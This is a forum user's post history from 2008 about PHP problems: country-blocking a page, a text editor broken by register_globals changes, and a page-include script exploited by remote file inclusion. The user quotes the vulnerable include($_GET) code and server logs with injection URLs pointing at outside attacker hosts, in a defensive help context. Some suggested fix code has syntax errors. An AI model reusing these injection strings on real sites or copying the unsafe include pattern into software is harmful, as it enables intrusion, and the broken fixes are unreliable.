drfate
-
Posts
10 -
Joined
-
Last visited
Never
Posts posted by drfate
-
-
I also found an example at;
GeoIPEnable On
GeoIPDBFile /path/to/GeoIP.dat
# Redirect one country
RewriteEngine on
RewriteCond %{ENV:GEOIP_COUNTRY_CODE} ^CA$
RewriteRule ^(.*)$ http://www.canada.com$1 [L]
So if I put this HTACCESS file in a directory called comp, I could use the above code to redirect?
cheers,
Andrew
-
You can block by .HTACCESS, however from what I can understand, it blocks access to your entire site which is not what I want to achieve
-
Hi everyone,
is it possible to block certain countries from accessing individual pages?
For example, we have a competition page and we only want Australian Users from accessing it?
Can this be done through PHP? I don't want to block ENTIRE countries from the entire site, just a particular page?
Thanks in advance.
cheers,
Andrew
-
http://www.pacote270178.xpg.com.br/teste2.txt
lol..... It looks like who ever exploited your site is using your server to mass email. Depending on how many people he's spamming, you get get some fun messages soon ;p.
First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages.
Second, restrict it some how. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default'; if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) { require 'some/folder/' . $page . '.php'; } else { echo "Page not found!"; }
Hi Corbin,
thanks for your help.
Just a quick question, I have a .htaccess file which displays the following:
RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]
and I put the following code in:
<?php
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {
require 'dvd/' . $page . '.php;
}
else {
echo "Page not found!";
}
?
Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111
What am I missing?
-
1. This has nothing to do with object oriented programming (OOP).
2. Code tags are your friends.
3. Your problem stems from not securing your incoming query strings. At all.
A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages.
$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names $page = strtolower($_GET['page']); //make sure the incoming value is all lowercase if(!in_array($page, $allowedPages)) { echo "I don't think so...."; } else { include $page . '.' . $type; }
Hi Nightslyr, unfortuantely my site has quite few pages, any other ideas?
-
Mchl wrote:
Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution.
How do I fix this?
-
Hi Everyone,
I've got the following code in in a PHP which opens up a .HTM
<?php
if (isset($_GET["page"])){
$thepage = $_GET["page"];
$thetype = $_GET["type"];
include $thepage.'.'.$thetype;
}
?>
The problem is, this code is being exploited (see below for example).
Does anyone know how to stop this?
189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"
70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"
124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"
189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"
cheers,
Andrew
-
hi there,
thanks for the assistance but unfortunately it didn't work. The server guys apparently installed phpsuexec after the crash happened over a week ago and registry_global = off? Would that be causing this?
regards,
Andrew -
Hi all,
being a user at webfreaks for the last 2 years, their hard drive crashed a few weeks ago and now my simple PHP text editor will not work, I know they have done something on their end because it worked for the last two years. Here is the code that once worked:
It basically showed a list of text which I could edit online, nothing special but nice and quick, anyone know why this won't work anymore? The error I'm getting is:
Notice: Undefined variable: submit in /home2/impulse/public_html/admin/edit.php on line 3
Notice: Undefined variable: data in /home2/impulse/public_html/admin/edit.php on line 11
However, I never use to get this error until the server fiddled with something :( I'm at my wits end, any help would be GREATLY appreciated.
FILENAME: edit.php
<?php
if ($submit) {
$fp = fopen("data.txt", "w");
fwrite($fp, stripslashes($newdata));
fclose($fp);
}
$fp = fopen("data.txt", "r");
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
fclose($fp);
?>
<html>
<head>
<title>simple text editor</title>
</head>
<?php
$filemod = filemtime('data.txt');
$filemodtime = date("F j Y h:i:s A", $filemod);
echo "<center>This File was last updated $filemodtime</center>";
?>
</font>
<CENTER>
<form action="<? print $PHP_SELF; ?>" method="post">
<textarea name="newdata" rows="26" cols="40">
<?
print $data;
?>
</textarea><br>
<input type="submit" name="submit" value="Submit"></form>
Blocking Countries to certain PHP Pages?
in PHP Coding Help
Posted
Hmm... unfortuantely I cannot install GeoIP on my sever.
does anyone know the code I would use in my .htaccess to band certain countries?
e.g. domains with .au ?
cheers,
Andrew